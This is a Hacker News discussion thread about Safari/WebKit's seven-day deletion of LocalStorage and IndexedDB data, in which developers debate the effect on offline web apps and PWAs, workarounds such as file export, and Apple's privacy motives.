https://dexie.org/docs/StorageManager describes the StorageManager API which lets you prompt the user to allow your IndexedDB data to be stored more reliably. My first thought after reading this article was wondering if this would allow an exception to the 7 day rule... but then I remembered that Safari is the only 'modern' browser which does not support the StorageManager API

lol, sucks for users of my client side JS video game!

Aardwolf(10000) 3 days ago [-]

> Actually, I'd be even happier if any form of offline storage required explicit user permission anyway.

Even offline storage that is only used locally? Say a game with savegames that has doesn't use online connection to play it.

Another example: a password manager.

jwr(3920) 3 days ago [-]

I have an app which isn't offline, but I wanted to make use of IndexedDB and LocalStorage to make things faster for users. Now I wonder if it's worth the effort to even try. I think this pretty much kills the utility of all local storage initiatives.

My app is an inventory control system used by businesses that build electronics (https://partsbox.com/). Deleting client-side data after 7 days is ridiculous. You can't assume that people will always log in every week, in small businesses or design/manufacturing companies there are times when 2-3 weeks can pass without building new hardware or touching inventory.

gok(538) 3 days ago [-]

Your demo page is 3.23 MB. ~500KB is javascript, ~500KB is CSS and another ~400KB is web fonts. The parts database is 24 KB. That's certainly not the first place I would look for an optimization target, even for customers with very large parts databases.

k__(3378) 3 days ago [-]

CouchDB and Amplify Datastore do delta syncs, should this get around the problem?

If you put data in IDB, it will stay there for 7 days and then if it gets deleted the delta sync would just download it again.

diegoperini(4242) 3 days ago [-]

Both your and Apple's concerns are valid. This change makes the fact (arguably) that these local storages are caches apparent.

Some web apps already saw the danger of having an easily purge-able storage on the client side and simply implemented an export function for their tools. I admire those tools more than the ones who overuse local storage for everything.

One such tool is draw.io, a flowchart maker. You use the app, persist everything in local storage and when you are done, you export your project into a file, all happening on the client side. When you need to edit, you import the file on launch. It's portable, it's protected from browser bugs/decisions and imho pretty user (privacy) friendly.

fossTheWay(10000) 3 days ago [-]

>deleting all local storage (including Indexed DB, etc.) after 7 days

Evil company. How do we fix this? Shame users?

The problem is that the users are so brainwashed from decades of Marketing.

lotsofpulp(10000) 3 days ago [-]

> The problem is that the users are so brainwashed from decades of Marketing.

Is there any other device or ecosystem of devices where my parents can fix their problems by turning it off and on? The fact that I have 80 years old grandparents who can't read English using iPads and iPhones is not just marketing, that's "not having to google and download malware bytes and ccleaner and go into regedit" to maybe fix issues.

davweb(4090) 3 days ago [-]

I think the original post is oversimplifying the new behaviour a little. If you look at the other blog post on ITP 2.3 [1] it says:

> ITP 2.3 caps the lifetime of all script-writeable website data after a navigation with link decoration from a classified domain.

i.e. the 7 day timeout for local storage only kicks in if you've been redirected from a domain that ITP has classified as one that tracks users. So, for example, web apps that users navigate to directly will be unaffected.

[1]: https://webkit.org/blog/9521/intelligent-tracking-prevention...

magicalist(4152) 3 days ago [-]

> If you look at the other blog post on ITP 2.3...

why would you look at the old blogpost for the new behavior?

It's all web pages, regardless of classification or redirects. The new webkit blog post is quite clear:

> Now ITP has aligned the remaining script-writable storage forms with the existing client-side cookie restriction, deleting all of a website's script-writable storage after seven days of Safari use without user interaction on the site

https://webkit.org/blog/10218/full-third-party-cookie-blocki...

Or straight from the ITP lead's twitter:

> Fifth, all script-writeable storage is now aligned with the 7-day expiry Safari already has for client-side cookies.

https://twitter.com/johnwilander/status/1242516001939324928

(with follow up replies on what resets the seven day clock)

brlewis(1545) 3 days ago [-]

You're describing behavior from 2019-09-23

I see the same 'oversimplifying' in webkit's 2020-03-24 blog post linked from the original post. See '7-Day Cap on All Script-Writeable Storage' in https://webkit.org/blog/10218/full-third-party-cookie-blocki...

t0astbread(10000) 3 days ago [-]

Okay that's good but still, couldn't a domain on that list be weaponized against legitimate sites this way? For example:

- Somehow goodsite.com's user ends up on evil.com

- evil.com redirects to goodsite.com?clickID=1234

- goodsite.com's storage gets flagged

pier25(2695) 3 days ago [-]

> So, for example, web apps that users navigate to directly will be unaffected.

I don't think that's true.

I asked the head of Webkit dev on Twitter and he said:

> This time limit affects first-party storage

https://twitter.com/othermaciej/status/1242926762029285376

noobquestion81(10000) 3 days ago [-]

This! ^

Could someone please change the title of this post? It's rather inaccurate and spreading FUD... legitimate offline web applications are not going to randomly lose their storage abilities in Safari. Tons of people read this (admittedly hard to follow) blog post quickly and then took a nose-dive into their own hot takes.

Hoping Webkit pushes another of these posts later to clear things up.

BiteCode_dev(10000) 3 days ago [-]

> website.example will be marked for non-cookie website data deletion if the user is navigated from a domain classified with cross-site tracking capabilities to a final URL with a query string and/or a fragment identifier, such as website.example?clickID=0123456789.

So my guess is you are fine most of the time, except if you allow other sites to embed your content in their page. In that case, you should:

- provide the embed on a separate subdomain

- remove features requiring identification if the content is view embedded: attempting to use them redirect to the real site.

Otherwise ITP will mark your domain as tracking and wipe you after 7 days if your user don't interact directly with the site.

I have a hard time deciding if it's a good thing or not.

I guess it has the potential to be mostly a good thing, provided that:

- I understood it correctly, which I'm not sure, as their wording is not clear

- It's implemented correctly. Once the deal is done, it's in the wild years, fix or not.

- It's implemented in good faith. Apple wants to promote the app store and has shown to neuter web apps in the past.

I still have a strange bad feeling about this.

kevin_thibedeau(10000) 3 days ago [-]

When will Google Analytics and Google Tag Manager get onto this list of trackers? Lots of web apps are using them.

pspeter3(3406) 3 days ago [-]

I think confirmation in the blog post yesterday would have provided a lot of clarity.

wolco(3800) 3 days ago [-]

It doesn't scale from device to device for settings or items that should stay for longer than a week.

Local storage should be treated as cache.. it may get refreshed.

What Apple did was fine. A backend isn't only for storage either.

soapdog(4079) 3 days ago [-]

It is not fine if you're creating apps that don't have a backend.

SahAssar(10000) 3 days ago [-]

A lot of 'normal' apps treat local storage this way. A lot of those apps are basically a wrapper around a WebView. Why does apple accept it there but not for PWA:s?

WalterSear(3758) 3 days ago [-]

This sounds like a death-knell for my personal project: a fully decentralized collaborative task/wiki, built on ipfs, and encrypted against your blockchain wallet. I had just migrated the backend from firebase, too, and was ready to re-launch the beta next week.

Pretty much any PWA that was using ipfs as anything but a caching/distribution layer is no longer viable. This is a huge blow to decentralization technology.

Sure, you can make a standalone app, but that is going to cripple already difficult adoption.

This sucks :(

soapdog(4079) 3 days ago [-]

I'm coming from a decentralization tech background as well and was working on similar stuff. That's why I'm so angry at this arbitrary decisions by Apple. This is just them breaking something that has been working well.

hawaiian(10000) 2 days ago [-]

I know I'm in the minority, but I'm glad this change is happening. I simply don't trust large tech companies to keep user privacy a top priority, and in my mind, this outweighs whatever UX niceties an honest company may provide.

jeswin(2415) 2 days ago [-]

The solution could be to give that option to users; a way to mark a website or app as trusted or not. Apple's approach on the other hand really sets the web apps back, which I (as a privacy concious individual) am more comfortable using compared to apps.

If this encourages more apps to go the native route, we've done more harm than good. Apps can gather a lot more data than websites, such as the dreaded contact list access.

alexcroox(3984) 3 days ago [-]

Are we absolutely sure they don't just mean the localstorage containers that aren't part of the current domain? In the same way they are clearing cookies from a different domain, and not the ones that belong to the current domain.

EDIT: Clarification from a Webkit dev https://twitter.com/alexcroox/status/1242559843354972161

dangoor(3929) 3 days ago [-]

Yeah, if you look at the section in question, they're talking about this: 'However, as many anticipated, third-party scripts moved to other means of first-party storage such as LocalStorage.'

Basically, the ad tech/tracker folks were using first-party site storage to store identifiers, which is what Apple's trying to protect against.

reilly3000(4310) 2 days ago [-]

This is really in response to the irresponsible use of APIs for trackers. Evercookie is a stunning example of how far it can go... From their repo:

- Standard HTTP Cookies - Flash Local Shared Objects - Silverlight Isolated Storage - CSS History Knocking - Storing cookies in HTTP ETags (Backend server required) - Storing cookies in Web cache (Backend server required) - HTTP Strict Transport Security (HSTS) Pinning (works in Incognito mode) - window.name caching - Internet Explorer userData storage - HTML5 Session Storage - HTML5 Local Storage - HTML5 Global Storage - HTML5 Database Storage via SQLite - HTML5 Canvas - Cookie values stored in RGB data of auto-generated, force-cached PNG images (Backend server required) - HTML5 IndexedDB - Java JNLP PersistenceService - Java exploit CVE-2013-0422 - Attempts to escape the applet sandbox and write cookie data directly to the user's hard drive.

https://github.com/samyk/evercookie

In short, everything and more can be used for tracking, and that has really killed the party for the many people who have created responsible, useful applications of these browser APIs.

thu2111(10000) 2 days ago [-]

It's really in response to a confused, ad-hoc web privacy model that has never been designed and is simply incrementally patched over time in response to complaints from an equally confused, directionless and visionless 'privacy warrior' subculture.

Mobile apps suffer these kinds of problems far less, partly because it's understood that actually mobile users don't install apps then get upset about 'tracking', in fact, the vast majority of apps will want you to sign in to some sort of account and those that don't will be using ad networks to fund themselves, that users understand and accept this and that throwing up permissions screens doesn't achieve much because users will typically grant the permissions. Privacy on mobile platforms is more about stopping activity the average user would recognise as illegitimate spying - turning on cameras and microphones to feed conversations to angry ex-girlfriends, that sort of thing.

If the web's architecture had some sort of coherent view on how the tension between users, content providers and advertisers should work, then we wouldn't see this steady endless churn of app-breaking API changes. Everyone would know the rules of the road and there'd be way less tension as a result. Mobile platforms aren't quite there because they were designed with security architectures that were then pressed into service as ad-hoc privacy architectures, but they're still far more coherent on the topic than the web.

dep_b(10000) 2 days ago [-]

You could permissionwall that stuff, just like iOS asks for permissions to ask your location. If a random website wants to mess with Local Storage I know that I need to turn around.

schoenobates(10000) 2 days ago [-]

"... abusing over a dozen technologies..." is this a proof-of-concept or a real thing ? It just seems too horrendous to be real.

I think your comment really hits the nail on the head, IMHO the frustration shouldn't be directed toward Apple but more toward the groups who have pushed the tracking practice so far to necessitate such draconian measures.

pat2man(4002) 3 days ago [-]

Sounds like the solution is to add the app to your home screen. I don't think its reasonable for a browser to let any site I ever interact with to store data on my device indefinitely

dwnvoted2hell(10000) 3 days ago [-]

I don't understand why you wouldn't rely on some other normal local storage for an app, except to be super lazy making cross device apps with some platform. I think that's what all the screaming is about. Low budget cross compatible apps will suffer.

soapdog(4079) 3 days ago [-]

Even web apps that you add to your home screen are subjected to this.

nikkwong(3698) 3 days ago [-]

It depends on the context.. For example, I use an invoicing web app that stores previously created invoices indefinitely in localStorage. This gives me the benefit of not having to manage login credentials and keeping everything client-side. It also gives the site's developers the benefit of not having to manage user accounts or server side state.

Without being able to use localStorage as a long term store, I'll have to register for an account, have to deal with them handling my data, etc. Losing the functionality of localStorage as a long term store has disadvantages.

megous(4302) 3 days ago [-]

How does this make sense logically? Obviously the websites that you use the most have the biggest potential and opportunity to track you. All local storage should be deleted for the most used websites at random times, at avg. several times a week, without any extensions caused by recent website usage.

If this is done for privacy's sake, that is.

quotemstr(3690) 3 days ago [-]

> All local storage should be deleted for the most used websites at random times, at avg. several times a week, without any extensions caused by recent website usage.

No matter what browser vendors do, it will never be enough for 'privacy' activists.

flixic(3714) 3 days ago [-]

Safari already was lagging behind Chrome, Chrome forks and Firefox in a lot of feature adoption. This will only make it more of a 'new Internet Explorer', a browser that sites recommend you NOT to use.

realusername(3793) 3 days ago [-]

As a web developer, I spend as much time to fix stuff for Safari as for IE11, I consider them on a similar level.

twsted(2860) 3 days ago [-]

Normally when one said 'the new Internet Explorer' he meant 'the browser that was always recommended to use', 'the browser that stopped innovation because it was almost the only one used'.

scarface74(3932) 3 days ago [-]

Good luck with telling people not to use Safari (or more accurately WebKit) on iOS....

slaymaker1907(10000) 3 days ago [-]

I agree, this is really stupid. Data should only be reclaimed when requested by the user or if more storage is needed on the system on a LRU policy per site.

olliej(3716) 3 days ago [-]

Could you ask all the privacy abusers to stop using them to abuse privacy?

Seriously, you should browse the web for a bit and see just how many 'client side PWAs' you've used/installed, vs how many tracking identifiers have been installed.

Abishek_Muthian(4072) 3 days ago [-]

I think looking at Apple as saviour of Privacy, is for lack of better term just wrong. They have always favoured closed systems even if didn't provide privacy advantages or as in this case was counter-intuitive for privacy.

I feel the comparison of Apple with data companies such as Google, Facebook is by itself at fault. Apple like any computer company of 70's was not into data, just because Internet itself didn't exist at that point like it does now. 'Apple didn't choose to be in data' is projected as altruistic, instead of just a marketing ploy(they didn't choose, because it wasn't available).

Apple doesn't receive even the fraction of scrutiny Google, Facebook receive (which they should). e.g. iCloud hack, Apple's response to iOS vulnerabilities targeted by state actors, Newer Safari being incompatible with privacy extensions such as uBO etc.

Personally I feel good that Apple is not into data, just because I feel if they are into data; they might be more evil than Google or Facebook aided by their walled garden.

Arnt(10000) 3 days ago [-]

This is webkit, which is open source. Apple took an existing HTML/CSS/DOM engine, rewrote it, renamed it, and opensourced its version, too.

It's compiled using LLVM, which also contains thousands of lines of open source code by Apple.

Of course you might argue that these examples don't prove your sweeping statement false, but please read https://en.wikipedia.org/wiki/No_true_Scotsman before arguing.

millstone(10000) 2 days ago [-]

When you use Apple Maps, Apple doesn't know who you are, where you go. There's not even a way to sign in.

It's not incompetence. When you request a route, your iPhone breaks up the request into separate, unrelated segments so Apple doesn't even know your total route. They've done work to avoid tracking you.

Call it a 'marketing ploy' or 'altruism' or whatever, but the fact is that Google wants to know where you go, and Apple doesn't.

saagarjha(10000) 3 days ago [-]

> They have always favoured closed systems even if didn't provide privacy advantages

Yes.

> or as in this case was counter-intuitive for privacy

I fail to see how this is counter-intuitive for privacy.

> iCloud hack

Targeted spearphising?

> Apple's response to iOS vulnerabilities targeted by state actors

https://news.ycombinator.com/item?id=20897368

> Newer Safari being incompatible with privacy extensions such as uBO etc.

https://news.ycombinator.com/item?id=21025252

diggan(872) 3 days ago [-]

I think looking at ANY company as the savior of privacy is a waste of time. Companies have proven time and time again that they are unable to self-regulate this. Only way forward is to introduce legislation that makes it illegal to track users using privacy-invasive practices, otherwise we'll never get rid of it. A company can be privacy-preserving today, but then the leadership changes or acquisition happens, and now they change their practices, without informing users.

I simply see no technological solution to this problem, it'll always be a cat-and-mouse game, until governments catch up and makes it illegal.

I'm eager to hear if someone here does have any solution to this problem though.

lcfcjs2(10000) 3 days ago [-]

Google is bad, and facebook is worst.

FreakyT(3451) 3 days ago [-]

Agreed — Apple's trying to project a high-minded motivation here, but their real motivation is likely to try and limit web technologies so that companies must still invest in native iOS apps and remain within their walled garden.

rs23296008n1(10000) 3 days ago [-]

If privacy really is the thing, why can't I have an extension on ios to let me expire various cookies/storages on a per domain name basis, eg so I can write my extension to limit some cookies/storages to minutes or even seconds depending on how hostile or blacklisted such things are.

Other domains I'd actually prefer to be indefinite. I've got a notepad thing that uses local storage and doesn't store its data on the server. There's no excuse for deleting its data since its user data. Apple therefore has no permission to delete that data. Do I have a non-cloud workaround for that?

hokumguru(4338) 3 days ago [-]

Yeah, an App. They're kneecapping the PWA to make apps more appealing.

40four(4332) 2 days ago [-]

Anybody have an idea what the significance of the 7 seven day cutoff is? Can't imagine this magic number does anything to improve security. Seems kind of arbitrary.

chadcmulligan(4110) 2 days ago [-]

7 days is the side loading limit I think, so they're regarding these apps as sideloaded? Everything has to go through the App Store as a guess?

donohoe(163) 3 days ago [-]

I think it is worth noting that you can really say 'Apple' is doing this or 'Apple' is doing that with decisions at this level.

The company is just too big and not working in unison.

The Apple Safari Team is killing/hurting offline apps. The author asks why they don't take the same approach in Apple News - as if it is the same team that is in charge. Different team with different priorities and likely not talking to each-other.

I think the larger point is valid - but it better to understand that this isn't some cohesive cross-company strategy at play. Its size-able teams working on their own priorities within a larger roadmap (presumably).

JustSomeNobody(4099) 3 days ago [-]

I love these types of comments. They contrast very well with the "the reason Apple makes great products is because their hardware and software teams work so closely together to bring a cohesiveness that other companies can't" comments.

diggan(872) 3 days ago [-]

As Apple is one of the most closed companies, it's hard to put blame on anything Apple-related as you don't really know who the teams are. Sure, WebKit contributors are visible as it's an open source project, but who is the 'Apple Safari Team' really? And who is the 'Apple News' teams?

Easiest is just to put blame on the top-level entity, which is Apple. They have control over their teams so they can redirect the blame if they feel it's needed.

And if this change is to be able to force more developers to build native apps on their platform, then it's for sure a cohesive cross-company strategy. But we don't know if that's the case.

diegoperini(4242) 3 days ago [-]

I already have a comment on this subject in a thread here but I believe this should be stressed more explicitly.

Apple didn't kill offline web apps. You can always add an interaction to your app which exports the stored data into a file which then can be saved by the user. It can be done entirely on the client side as well. If anything died here, it is the implicit consent by the user for allowing unnoticed storage space consumption. Implementing an export function will automatically make your app portable, which is always appreciated I believe.

Most data on local storage is some kind of structured tree, table or blob. All can be exported with only little effort.

HTML5 games -> Prompt user with a dialog to download saves/assets after they play the game for a while.

Productivity apps -> Detect 'ctrl/cmd + s' to prompt a save dialog. Add save buttons somewhere visible.

Map like apps -> Do nothing. If the user is not visiting the map for 7 days, they don't need the map data persisted either. If necessary, allow explicit save with UI buttons for people who travel often.

Apps/sites which use local storage for auth related artifacts -> Notify users if they click 'Remember Me' and explain them the caveats. Allow for encrypted save if users ask for it.

Kiosks -> Use Electron or a similar tech.

I am open to counter arguments. I don't have any idea about how mobile browsers behave for the scenarios stated above.

Edit: I use draw.io since last year and the experience there is as refreshing as it can be in this SPA jungle. I use it as a good example to learn from for my own web app projects.

kristiandupont(1920) 3 days ago [-]

>I don't have any idea about how mobile browsers behave for the scenarios stated above.

That's the problem, it won't work there. Apples support for PWA's is frustrating to say the least.

It's fair that you might need consent from the user before storing and keeping large amounts of data, but by removing the option you are forcing a bunch of developers to make a native app instead of a webapp which I find quite infuriating.

duxup(4060) 3 days ago [-]

>You can always add an interaction to your app which exports the stored data into a file which then can be saved by the user.

But... why? Drag the user through some dialogue to save a file locally / manage / be responsible for that and then deal with that whole deal? That seems like very... old / unnecessary.

The fact that applications store some random things locally to me is neither surprising nor a hassle. Browsers already cache files and etc. Unless I don't know something... LocalStorage and other non cookie options seem just fine / safe.

I get the concerns about cookies and such but this seems a step beyond what is needed into the realm of unnecessary / a hassle for the user.

Maybe I'm missing some bad patterns / dark patterns using LocalStorage and etc but it seems to throw them out with the bathwater.

pier25(2695) 3 days ago [-]

These are workarounds for a problem that shouldn't exist in the first place.

alerighi(10000) 3 days ago [-]

Doesn't make sense, just ask the permission to use the local storage to the user if that is the deal.

But that is not the deal, the deal is that they fear that more and more developers are moving to webapps instead of developing native apps that need to pass trough the App Store and thus be approved by Apple, and they don't like that.

megous(4302) 3 days ago [-]

- Give user the option whether to enable 'unlimited' storage on per-domain basis. There's already a standrad API for that.

aquadrop(4272) 3 days ago [-]

And for what? To save space? That's ridiculous.

> If anything died here, it is the implicit consent by the user for allowing unnoticed storage space consumption

What about explicit consent? It also dies. That's just inventing problems.

donatj(3615) 3 days ago [-]

This might technically work, but is an absurdly user-unfriendly.

Name a modern game that required you to manually manage game state files, let alone didn't have autosave. It's a feature users expect, and they're going to have a bad time. I don't want to play a quick game on my phone and have to remember to save and where I am keeping my save files.

I'd argue a far better options would be just to treat local storage as a permission like camera or microphones.

floatingatoll(4062) 3 days ago [-]

It seems like the Storage Standard [1] could be combined with the writeable-files proposal [2] to permit the same sort of behavior for local files-on-disk webapps as mobile apps receive, where they can download large asset files and store them on disk in a persistent cache:

https://storage.spec.whatwg.org

https://wicg.github.io/native-file-system/

snemvalts(10000) 3 days ago [-]

So i can start to manage save files on my disk? in 2020?? this is absurd.

apple should fix their safari bugs first before starting with this nonsense.

henriquez(10000) 3 days ago [-]

Also you could sync data to an API and offer a login function. If the cookie expires, login and download your data again. This could be end-to-end encrypted for privacy, and having remote storage enables other clients to login and access the same data. Either way it's wise to have some kind of persistence option beyond just cookies and localStorage.

It's annoying how far Apple is behind Mozilla and Google when it comes to progressive web app functionality, but I don't think their action is as user-hostile as is being raised here.

gridlockd(10000) 3 days ago [-]

Dear lord, I hope you don't have any UX design responsibilies.

> Apple didn't kill offline web apps.

Yes, they did. For an app to work offline, you need to be able to at least cache the app itself. If that gets wiped after seven days, you can't call your app 'offline capable'.

> If anything died here, it is the implicit consent by the user for allowing unnoticed storage space consumption.

What about the 'implicit consent' that bandwidth is being consumed?

> You can always add an interaction to your app which exports the stored data into a file which then can be saved by the user.

That would be awful. Imagine being prompted to import your data every time you launch it.

Maybe that sort of works with document-centric apps that have no persistent settings, but even then it wouldn't be possible to integrate properly into the file system in the way users would expect (file assocations).

> HTML5 games -> Prompt user with a dialog to download saves/assets after they play the game for a while.

More like constantly reminding the user that their valuable progress gets wiped after seven days, should they make the poor choice to run the app offline.

> Productivity apps -> Detect 'ctrl/cmd + s' to prompt a save dialog. Add save buttons somewhere visible.

Same as above, except the data might be even more valuable.

> Apps/sites which use local storage for auth related artifacts -> Notify users if they click 'Remember Me' and explain them the caveats.

'I'm sorry, we made a decision to write an app with technology that, in hindsight, we shouldn't have used. Therefore, your user experience will now be more annoying. Thanks for sticking with us while we're rewriting the app!'

thosakwe(4098) 3 days ago [-]

I don't understand why the title was changed - the focus of the article isn't just on the fact that WebKit is changing how it handles local storage, but also a criticism of Apple's motivations for this decision.

thosakwe(4098) 3 days ago [-]

Original article was here, in case my comment makes no sense now: https://news.ycombinator.com/item?id=22683535

I was confused as to why the page in question had changed, but I realized it was moved.

zeveb(631) 3 days ago [-]

And the new title no longer has any relationship to the title of the post. And no admin (from what I can see) even bothered to let us know why he censored this.

edit: 17 minutes after posting this comment critical of moderation, I am unable to submit a new story. Coincidence?

meesterdude(3643) 3 days ago [-]

webkit is open source - can't this be changed (be it by fork, or a commit proposal?)

The_rationalist(10000) 3 days ago [-]

The PlayStation(s) browser is using webkit BTW (they are a decade late to switching to chromium..)

matkalaukku(10000) 3 days ago [-]

Sure it can be forked, but the problem is the millions of devices running Apple's version of Safari/WebKit on iOS without any say in it except switching to Android.

abrowne(3853) 3 days ago [-]

Sure, so maybe WebKitGTK will (if this applies to that version). But why would Apple choose to include this fork over their own version in their OSes? If they don't how do you plan on using it with any Apple OS?

starbugs(1952) 3 days ago [-]

Is this really that big of a problem? You had to be expecting that local storage is deleted without any notice anyway, in every web app.

MatthewPhillips(1962) 3 days ago [-]

I absolutely don't have that expectation. I built a comic reader app that I use on my Android tablet, which saves files to IndexedDB. I've been using this for over a year and no files have ever been deleted, even after I stopped using the app for a month or so.

If Apple provided an alternative this would be ok. An alternative such as the native file access API (still a WIP). Or a prompt so that the user can allow long-term storage. Or supporting the web app manifest so that users confirm they want to 'install' a web app, granting it greater permissions.

But they've offered no alternatives here, that I can see. They've determined that client-side web apps are simply not important.

IvanK_net(3963) 3 days ago [-]

I have many useful files in my computer, which I don't want to be deleted. You are saying, that it is ok, if the OS deletes all files in my computer from time to time.

A local storage is the only way webapps can store any data in your computer (other than asking you to manually load / save some configuration file). Not all webapps can afford cloud storage for all user.

floatingatoll(4062) 3 days ago [-]

Perhaps the author doesn't realize that WebKit is open source. They could have used their screed to propose to the WebKit team that a first-party page loaded from a file:/// URI not have its client-side storage subject to the 7-day purge, by setting the 'firstPartyWebsiteDataRemovalMode' network connection property to 'none' — patch included! But they did not, which is quite disappointing.

The new change to ITP is here: https://github.com/WebKit/webkit/commit/4db42c1571d821572ea9...

The cookie filtering logic specifically is located here: https://github.com/WebKit/webkit/search?q=filtercookies

The file:/// handler is implemented here: https://github.com/WebKit/webkit/blob/master/Source/WebCore/...

(I don't have anything to do with Apple or WebKit.)

DiabloD3(26) 3 days ago [-]

Apple does not use that Webkit branch, however. They maintain their own branch internally that cherry picks from upstream. Webkit could very well accept a patch, and then Safari never ships that patch because they disagreed with it for use in Safari.

Also, unrelated fun fact: Did you know Webkit still uses svn? That Github repo you linked to is a clone of Webkit's own git repo (git.webkit.org), which is a mirror of their actual repo (svn.webkit.org).

IvanK_net(3963) 3 days ago [-]

It is related only to WebKit (Safari). So I think people will just switch to other browsers.

diggan(872) 3 days ago [-]

Except for iPhones/iPads where you don't really have a choice. Also most people don't give a shit which browser they use, they just use whatever browser is available when they get their device, which makes sense. But those users might soon have their data removed without really understanding why.

40four(4332) 2 days ago [-]

This just sounds like a great reason to not use Safari. I switched to iOS recently, but I'm a dedicated Firefox user, so I personally don't touch it except when I'm forced to by other apps opening links. (I was honestly REALLY disappointed in Apple when I realized that you're not allowed to set a default browser besides safari, but that's another story)

Forgive me, I'm a long time Android user, but do a lot of people choose to use safari as their main iOS browser, or are the usage numbers inflated because of the vendor lock in?

hoten(10000) 2 days ago [-]

All browsers on iOS are webkit (read: safari) under the hood. Firefox and Chrome are just skins.

sequoia(3648) 2 days ago [-]

'do a lot of people chose to use safari' No. On iOS, www = safari to almost all users.

sidhanthp(3490) 3 days ago [-]

I think this is a good idea. Developers should not be able to store something on my computer indefinitely without my consent. This doesn't apply to applications users add to their home screen.

This doesn't 'destroy' the PWA ecosystem. Just makes a user's intention explicit when they save a PWA to their home screen, rather than continuing to use it within the browser.

From the WebKit Blog (https://webkit.org/blog/10218/full-third-party-cookie-blocki...) 'Web applications added to the home screen are not part of Safari and thus have their own counter of days of use.'

duxup(4060) 3 days ago [-]

Your browser is already caching a whole lot of stuff that you don't know about just by visiting a site.

A little LocalStorage isn't going to hurt you.

Cookies I get, but I don't know of any dark patterns with localstorage / the benefits are pretty great.

briandear(1439) 3 days ago [-]

What's wrong with a "normal" app? No server required and data stays only on the device. The argument that the author is building a PWA because other people abuse privacy (with apps) doesn't make much sense. Why not build the app, respect privacy, and be done with it?

LocalStorage is not a substitute for an actual database, it's a cache. The problem with the author's technique is that privacy minded users clear their browsers from time to time, so they would be inadvertently clearing data they actually wanted to keep because who uses LocalStorage as a persistent data store? Sure it could be used like that as an "off label" use, but generally it's used to cache what is persistently stored elsewhere or used as a means to avoid multiple network calls in the process of doing something (such as saving calculations, the results of which would be eventually persisted.) Local Storage should be used as if it were a session store rather than something persistent.

sj4nz(4300) 3 days ago [-]

The problem with a 'normal' app is now you are beholden to the rules/regulations/evaluations of a third party that can easily decide without recourse that your 'app' should not be in their store. Even if your app 'is fine' every update and upgrade incurs a delay through the third party's reviewing process before your users receive it.

If the web browsers would provide _some API_ for persistent storage without yanking the carpet out from underneath developers this wouldn't be such a huge problem. There _used_ to be a file-access API but it was removed.

Personally, I think web browsers are too large a surface area to secure/keep secure and the world is probably going to swing the opposite direction to native, downloadable applications without the interference of a third-party store.

SahAssar(10000) 3 days ago [-]

A normal app requires a separate build process, users to install it, manual review for each update, perhaps the platform owner will just deny it without reason, and for Mac/iOS it also requires actually owning or 'borrowing' (using another persons/companies) build machine and software.

I don't understand why an installed PWA should not be able to keep their storage just as a 'normal' app can. It would clearly be better for both developers and users. There are so many apps & websites that could be more privacy friendly if they could just trust localstorage to actually be 'storage'.

awinter-py(1536) 3 days ago [-]

push messaging also doesn't work for PWAs on ios

(it does on android)

I get that controlling the walled garden is apple's mobile strategy now, but this is costing developers so much blood sweat & tears.

Both xcode and android studio are heavy + horrible compared to web, and the fact that you have to use both tools to release at scale makes them worse. Shopify wrote a dev post a few months ago saying 'we're react native as much as possible now' and claiming it makes life easier, but react native is worse than PWA because you still have to build for mobile 2x and deal w/ app store nonsense.

If PWAs supported push on ios, with or without cookie expiration, they'd be the preferred launch strategy for most non-game apps.

p1necone(10000) 3 days ago [-]

Hasn't aggressively controlling the walled garden always been Apples strategy? I don't see them changing any time soon. iOS didn't even have an app store initially, and it took a lot of pushing for that to happen (they realized Android was going to eat their lunch if they didn't).

chrisshroba(3652) 3 days ago [-]

Does this also mean you'll have to re-login to websites every 7 days? (Sorry, not very familiar with web tech!)

icebraining(3767) 3 days ago [-]

No, you'll have to re-login only if you haven't been to the site in the last 7 days.

thehappypm(10000) 3 days ago [-]

Maybe I'm being cynical here -- I'm not a web developer but have lots of experiencing managing web-based products -- but if you want to have state you should store it in the cloud, because local devices are volatile. Xbox Live, for example, uses a fairly simple service for cloud saves for games; local saves still happen but any developer has the option to push saves to the cloud. The author definitely raises good points about how it's easier for developers to not have to worry about it, but cloud saves have some hefty benefits, like multi device support, user getting a new device, etc.

duxup(4060) 3 days ago [-]

The problem is (at least for me) offline apps, or for customers who have poor or intermittent / unpredictable internet access.

They threw LocalStorage and etc out with the bathwater that are cookies.

deedubaya(4149) 3 days ago [-]

Yes, you're correct, but have you ever used an app that worked offline or performed well with a poor network connection? Or a website maybe provided wicked fast data access despite only having a 2G connection?

These technologies can be leveraged to improve usability. Unfortunately, advertisers and 3rd party trackers make it so we can't have nice things.

mattl(3780) 3 days ago [-]

> By now, most people are aware of the amount of surveillance and tracking that their web usage is subject to on a daily basis and how this data can be used in ways that do not match their own personal values.

Sorry, but no way.

szc(10000) 3 days ago [-]

The data for 'Local Storage' is stored in ~/Library/Safari/Databases -- you will need to give Terminal access to the Safari directory as the current Sandboxing works both ways, Safari stores security config info in this directory and scripted malware could / can exfiltrate data and change values in this location.

To violate privacy (aka enable tracking) a sub-iFrame could be set up that uses 'local storage' with a parent page security policy that allows communication across the iFrame boundary. Sorry, yes, I am being a bit vague.

Who cleans up ~/Library/Safari/Databases? I personally see crud in this directory from 2011 that has been migrated from older systems.

Almost not relevant now, but Flash also had a 'local storage' system that was shared across all Flash Apps. It also allowed (before sandboxing) local apps to proxy and communicate (via shared memory) with any standalone Flash App on the system through any page that used the Flash plugin -- i.e any running web browser, violating all attempts to have web compartmentalization rules.

dennisy(10000) 3 days ago [-]

This 'feature' also invalidates the use case for WebCrypto API, since a user's keys would be stored in IndexDB, which now means keys cannot be safely persisted.

synfonaut(10000) 3 days ago [-]

Exactly this. Most 'non-custodial' web wallets will die as a result of this change (some may even lose money/assets). Very unfortunate Apple!

sebringj(4343) 3 days ago [-]

That is terrible if you are working on a pwa game to cache assets offline. There should be some opt-in approach similar to location tracking in the background like some apps do. That seems way worse than simply having local data be relied upon. Not cool.

icebraining(3767) 3 days ago [-]

What's the problem with the client having to re-download those assets if they don't play for a week? Seems long enough that I'd expect a patch download on a typical gaming platform, for example.

Jach(2081) 3 days ago [-]

Workaround: encode your app's state into window.location.hash

icebraining(3767) 3 days ago [-]

That works as long as the user keeps the tab open, but if they use a bookmark (or just remember the domain), the hash part will be lost.

withinboredom(4322) 3 days ago [-]

I've seen this before on an ecommerce site :sigh:

Wife: Hey, check out this! [link with embedded state]

Me: Wow, I'm logged in as you and can even see your payment information! Let's not buy from this site!

Let's not do this. Ever.

stcredzero(3324) 3 days ago [-]

Many web developers are turning to Electron in these cases but IMHO this is a waste of resources as the Electron runtime is not shared among the different apps running and there is only so many browser engines your computer can run before it has impact on its performance

